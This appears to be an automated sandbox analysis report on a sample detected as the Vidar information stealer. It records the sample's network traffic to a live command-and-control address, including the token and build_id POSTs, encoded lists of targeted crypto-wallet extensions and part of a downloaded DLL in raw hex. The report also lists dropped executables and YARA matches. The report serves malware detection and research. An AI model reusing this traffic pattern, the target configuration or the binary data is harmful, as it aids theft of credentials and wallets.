4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49785	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:31 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:31 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 64 36 35 66 64 66 62 62 34 37 62 33 35 64 33 33 30 30 39 65 62 31 37 61 38 31 64 33 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 37 61 37 61 34 37 65 31 61 36 66 66 32 36 36 61 66 38 33 35 64 35 30 63 36 65 61 61 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"ad65fdfbb47b35d33009eb17a81d3649------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build_id"b607a7a47e1a6ff266af835d50c6eaa5------AECAKECAEGDHIECBGHIICont
2024-07-26 16:57:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:32 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49786	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:33 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Content-Length: 5485 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:33 UTC	5485	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 64 36 35 66 64 66 62 62 34 37 62 33 35 64 33 33 30 30 39 65 62 31 37 61 38 31 64 33 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 37 61 37 61 34 37 65 31 61 36 66 66 32 36 36 61 66 38 33 35 64 35 30 63 36 65 61 61 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"ad65fdfbb47b35d33009eb17a81d3649------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build_id"b607a7a47e1a6ff266af835d50c6eaa5------CGIDAAAKJJDBGCBFCBGICont
2024-07-26 16:57:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49787	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:35 UTC	241	OUT	GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:35 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:35 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Friday, 26-Jul-2024 16:57:35 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:57:35 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-07-26 16:57:35 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49788	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:38 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:38 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 64 36 35 66 64 66 62 62 34 37 62 33 35 64 33 33 30 30 39 65 62 31 37 61 38 31 64 33 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 37 61 37 61 34 37 65 31 61 36 66 66 32 36 36 61 66 38 33 35 64 35 30 63 36 65 61 61 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"ad65fdfbb47b35d33009eb17a81d3649------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build_id"b607a7a47e1a6ff266af835d50c6eaa5------FHCAEGCBFHJDGCBFHDAFCont
2024-07-26 16:57:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:39 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	12:56:02
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe"
Imagebase:	0xa10000
File size:	6'406'656 bytes
MD5 hash:	3472874EFE2C665AB11817CE53216D21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:56:03
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x830000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:56:42
Start date:	26/07/2024
Path:	C:\ProgramData\DBAAFIDGDA.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\DBAAFIDGDA.exe"
Imagebase:	0x9a0000
File size:	4'929'536 bytes
MD5 hash:	8E5286E3CAA11C78E275892A38F2E772
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\DBAAFIDGDA.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:56:43
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x8e0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:56:49
Start date:	26/07/2024
Path:	C:\ProgramData\DGDBKFBAKF.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\DGDBKFBAKF.exe"
Imagebase:	0xfd0000
File size:	5'109'736 bytes
MD5 hash:	675737D9B22BCFEFE651C11BD47D404C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\DGDBKFBAKF.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:56:50
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x770000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:56:59
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 2980
Imagebase:	0xc40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	43.6%
Total number of Nodes:	39
